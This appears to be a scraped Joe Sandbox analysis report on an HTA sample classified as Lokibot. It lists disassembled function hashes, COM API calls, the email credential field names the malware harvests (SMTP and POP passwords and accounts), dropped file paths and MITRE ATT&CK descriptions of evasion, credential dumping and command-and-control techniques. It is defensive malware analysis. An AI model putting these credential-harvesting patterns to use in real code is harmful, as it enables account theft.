Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopAccount, xrefs: 0040D0B6
SmtpServer, xrefs: 0040D0DC
EmailAddress, xrefs: 0040D074
SmtpPassword, xrefs: 0040D117
PopPassword, xrefs: 0040D0D0
SmtpPort, xrefs: 0040D0EB
PopPort, xrefs: 0040D0A7
Technology, xrefs: 0040D08D
PopServer, xrefs: 0040D099
SmtpAccount, xrefs: 0040D0FA

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kissmegoodthingwhichgivemebestthignswithgirluaremy.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seemybestthingswithentirelifetimethingstodomybest[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RESCCA7.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wtml4eu.cwv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lp2wctz.onn.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aexnbf4c.qju.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdza12tg.ior.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbzo3nf3.4yy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3c0vviw.r0e.psm1

Windows Analysis Report
kissmegoodthingwhichgivemebestthignswithgirluaremy.hta

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre